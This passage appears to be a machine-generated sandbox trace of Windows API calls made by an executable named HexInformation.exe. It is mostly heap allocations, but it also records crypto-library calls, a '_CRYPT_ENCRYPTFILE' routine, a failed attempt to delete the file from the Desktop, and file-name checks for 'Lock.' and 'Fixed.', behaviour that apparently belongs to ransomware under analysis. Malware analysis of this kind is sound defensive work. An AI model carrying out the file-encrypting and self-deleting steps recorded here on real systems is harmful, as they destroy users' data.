(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0180.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0180.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0180.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0180.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0180.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0180.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0180.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0180.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0180.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0180.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0180.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0180.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0180.164] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0180.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0180.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0180.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0180.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0180.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.165] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0180.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0180.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0180.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0180.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0180.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0180.166] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.166] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.166] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0180.167] FreeLibrary (hLibModule=0x756e0000) returned 1 [0180.167] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.167] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.167] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.167] CloseHandle (hObject=0x2a0) returned 1 [0180.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.169] CloseHandle (hObject=0x2d0) returned 1 [0180.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.300] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0180.300] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0180.300] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexInformation.exe", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe", lpFilePart=0x8cedf4*="HexInformation.exe") returned 0x2a [0180.301] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe")) returned 0x20 [0180.301] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f0ebef, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xe6f0ebef, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3e7b28f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c00, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HexInformation.exe", cAlternateFileName="HEXINF~1.EXE")) returned 0xa87310 [0180.301] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe")) returned 0 [0180.302] FindClose (in: hFindFile=0xa87310 | out: hFindFile=0xa87310) returned 1 [0180.302] GetLastError () returned 0x5 [0180.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0180.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0180.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0180.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0180.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0180.302] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0180.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0180.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0180.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0180.302] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0180.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0180.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0180.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0180.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0180.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0180.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0180.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0180.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0180.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0180.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0180.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0180.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e563a8 [0180.303] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexInformation.exe", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe", lpFilePart=0x8cf650*="HexInformation.exe") returned 0x2a [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0180.303] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe")) returned 0x20 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0180.303] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0180.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0180.303] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0180.303] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0180.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0180.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0180.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexLK.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0180.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exLK.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0180.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xLK.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0180.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LK.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0180.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0180.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0180.304] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0180.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0180.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexLK.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0180.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exLK.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0180.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xLK.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0180.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LK.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0180.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0180.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0180.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0180.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0180.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0180.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0180.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0180.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0180.306] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0180.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0180.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0180.306] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0180.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0180.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0180.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0180.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0180.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0180.311] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0180.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0180.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0180.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 